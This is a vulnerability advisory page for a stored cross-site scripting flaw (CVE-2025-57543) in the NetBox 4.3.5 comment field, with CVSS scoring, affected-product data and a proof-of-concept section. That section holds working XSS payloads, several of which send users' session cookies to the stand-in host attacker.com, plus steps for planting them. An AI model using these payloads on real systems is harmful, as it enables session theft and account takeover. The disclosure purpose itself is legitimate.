Security Vulnerability Report
CVE-2025-57543 CVSS 6.1 MEDIUM

CVE-2025-57543

Published: 2026-03-16 16:16:13
Last Modified: 2026-03-20 13:56:20

Description

Cross-site scripting (XSS) vulnerability in the NetBox 4.3.5 "comment" field on object forms. An attacker can inject arbitrary HTML, which will be rendered in the web UI when viewed by other users. This could potentially lead to user interface redress attacks or be escalated to XSS in certain contexts.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:netbox:netbox:4.3.5:*:*:*:*:*:*:* - VULNERABLE
NetBox 4.3.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!-- CVE-2025-57543 NetBox XSS PoC -->
<!-- Inject this payload in the 'comment' field of any object form in NetBox 4.3.5 -->

<!-- Basic script injection -->
<script>alert(document.cookie)</script>

<!-- Event handler injection -->
<img src=x onerror="fetch('https://attacker.com/steal?c='+document.cookie)">

<!-- Stored XSS via comment field -->
<svg/onload=fetch('http://attacker.com/log?data='+btoa(document.cookie))>

<!-- Steal session token -->
<script>
fetch('https://attacker.com/exfil?token='+encodeURIComponent(document.cookie))
</script>

<!-- NetBox specific PoC - Comment field injection -->
<!-- Steps: -->
<!-- 1. Navigate to any NetBox object form (Device, IP Address, etc.) -->
<!-- 2. Fill in the 'comments' field with the XSS payload above -->
<!-- 3. Save the object -->
<!-- 4. When any user views this object, the XSS will be executed -->

Weakness

CWE-79

References

https://gist.github.com/MerttTuran/d94acff59816bfd9492d1a738e89ebb4 - Exploit, Third Party Advisory